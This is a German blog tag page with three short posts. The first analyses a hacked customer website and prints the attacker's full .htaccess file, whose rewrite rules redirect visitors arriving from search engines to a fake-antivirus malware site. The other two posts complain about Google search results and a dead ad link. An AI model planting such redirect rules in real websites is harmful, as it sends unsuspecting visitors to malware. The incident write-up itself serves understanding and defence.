Artikel-Schlagworte: „Google“

Fehlgeleitet: Webseiten-Schädlingsbefall

Donnerstag, 18. Juni 2009

Bei einer Analyse einer Kunden-Domain fiel die .htaccess-Datei ins Auge:


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]

Sie stammt nicht vom Kunden, sondern ein Cracker hatte sich die FTP-Zugangsdaten per trojanischem Pferd vom Windows-Rechner des Kunden erschlichen. Mit diesen Zugangsdaten wurde dann obige .htaccess-Datei auf den Kunden-Webspace hochgeladen, außerdem auch einige Casino-/Porno-Links in einen <noframes>-Bereich der Webseite untergebracht.

Das perfide ist aber die .htaccess-Datei. Sie weist das Apache-Modul mod_rewrite an bei eingehenden Anforderungen an den Webserver zu prüfen, von wo der Surfer kommt (HTTP_REFERER). Hat der Surfer einen harmlosen Treffer auf einer Suchmaschinenseite angeklickt, die zu eben jener Kundenpräsenz führt, dann greifen obige Regeln: Kommt man von *oogle.*, *aol.* etc., dann greift die letzte Zeile mit der Regel (RewriteRule): Umleiten des Surfers auf die angegebene Adresse 87.248.180.89. Somit bekommt man bspw. von Google aus einen Treffer zu Brotbackautomaten, den man anklickt, landet aber nach dem Klick nicht auf der Brotbackautomaten-Seite, sondern auf der Seite des Schädlingsautors.

Dort war bisher eine Website zu finden, die in der Aufmachung an einen Virenscanner unter Windows XP erinnerte. Elemente waren so gezeichnet, dass sie wie Windows-Fenster aussahen. Dazu wurden Icons von Festplattenlaufwerken C: und D: eingeblendet und ein Fortschrittsbalken, der einen Überprüfungsvorgang der vermeintlichen Antiviren-Software aussah.

Und natürlich fand diese angebliche Überprüfung der angeblich eigenen Festplatte dann auch gleich Treffer: eine Warnmeldung schlug vor, gegen den gerade gefundenen Virus doch gleich das Gegenmittel herunterzuladen und zu starten.

Wenn man das dann getan hätte, hätte sich der Kreis geschlossen: ein weiterer PC wäre mit einem Schädling befallen gewesen, der dann im Hintergrund und unauffällig alles mit Windows hätte tun können: Tastatureingaben mitlesen und nach draußen übermitteln, als Spam-Drohne dienen (im Auftrag von anderen hätte der eigene PC dann unbemerkt Spam-Mails versandt) und/oder Teil eines Bot-Netzes zu werden.

Der Provider der Schädlingsseite hat nun den Webspace gelöscht oder abgedreht, die Seite ist nicht mehr erreichbar.

Schlagworte:, , , ,
Veröffentlicht in Internet, Sicherheit, Web | Keine Kommentare »

Alles wiederholt sich

Samstag, 11. Oktober 2008

In der EDV kennt man es: alles längst erledigt geglaubte kehrt wieder. In der ach so innovationsgetriebenen Branche ist mir das ein kleiner Trost.

In der Prä-Google-Ära watete man durch Myriaden von irrelevanten Treffern, die man mittels Metasuchmaschinen aggregiert geliefert bekam. Dann kam Google und lieferte relevant(er)es. Zusammen mit der sparsamen Oberfläche eroberte es die Welt.

Nun suchte ich bei Google nach „ZyXEL ISDN TA omni.net“, da mich die technischen Spezifikationen interessierten. Beim Anblick der ersten Trefferlistenseite fühlte ich mich sofort an 1998 erinnert: Preisvergleich.de, Dooyoo, Amazon, Idealo, Ciao, Twenga, Misco, Preisroboter, Treiberdownload-Seiten. Dazwischen fast schon verschämt eine ZyXEL-Seite, die nicht paßt. Seufz.

Schlagworte:
Veröffentlicht in Web | Keine Kommentare »

GoogleAds: Geld zum Fenster hinaus

Dienstag, 29. Juli 2008

Ich klicke ja durchaus auf Google-Werbeeinblendungen auf Websites, wenn mich das Thema interessiert.

Als ich in Google Groups nach einer alten Anfrage von mir zum Thema Netware 3.12 suchte, fand ich auf einer Trefferseite GoogleAds-Werbung mit dem Text:

Lizenzen für 3.12 , 4.1
4.2 , 5.0 , 5.1 , 6.0 , OES2 und alle Small Business Versionen
www.alte-netware.de

Das interessierte mich – ich würde gerne noch ein paar Netware 3.12 User für Services for Macintosh nachkaufen. <klick> Und schon landet man auf www.alte-netware.de.

Schade nur, dass man da dann ein 404 Page not found erhält. So hat Google jetzt ein paar Cent mehr und der Betreiber von alte-netware.de ein paar weniger. Ohne was davon zu haben. Das ist Werbegeld, das wirklich zum Fenster rausgeworfen ist.

Schlagworte:, , , , ,
Veröffentlicht in Web | 1 Kommentar »